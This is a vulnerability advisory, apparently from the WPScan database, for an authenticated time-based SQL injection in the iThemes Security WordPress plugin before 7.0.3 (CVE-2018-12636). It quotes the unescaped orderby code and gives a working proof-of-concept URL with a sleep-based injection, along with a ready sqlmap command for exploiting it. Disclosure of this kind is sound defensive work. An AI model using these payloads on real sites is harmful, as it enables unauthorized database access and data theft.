iThemes Security <= 7.0.2 - Authenticated SQL Injection



Description
The iThemes Security (better-wp-security) plugin before 7.0.3 for WordPress allows SQL Injection (by attackers with Admin privileges) via the logs page.

Vulnerability description:

iThemes Security appears to be vulnerable to time-based SQL-Injection.

Parameter orderby is vulnerable because backend variable $sort_by_column
is not escaped.

Privileges required: Admin user.

Technical details:

File: better-wp-security/core/admin-pages/logs-list-table.php
Line 271: if ( isset( $_GET['​ orderby​ '], $_GET['order'] ) ) {
Line 272: $​ sort_by_column​ = $_GET['​ orderby​ '];

File: better-wp-security/core/lib/log-util.php
Line 168: $query .= ' ORDER BY ' . implode( ', ', $​ sort_by_column​ ));

Proof of Concept
The following GET request will cause the SQL query to execute and sleep for 10 seconds if clicked on as an authenticated admin:

http://localhost/wordpress/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip%2c(select*from(select(sleep(10)))a)&order=asc&paged=0

Using SQLMAP:

sqlmap -u 'http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip*&order=asc&paged=0' --cookie "wordpress_b...; wordpress_logged_in_bbf...;" --string "WordPress" --dbms=MySQL --technique T --level 5 --risk 3

Affects Plugin

fixed in version 7.0.3

References

CVE 2018-12636
URL https://plugins.trac.wordpress.org/changeset/1894782/better-wp-security

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Çlirim Emini
Submitter Website https://www.sentry.co.com/
Views 1580
Verified No
WPVDB ID 9099

Timeline

Publicly Published 2018-06-22 (5 months ago)
Added 2018-06-25 (5 months ago)
Last Updated 2018-08-29 (3 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.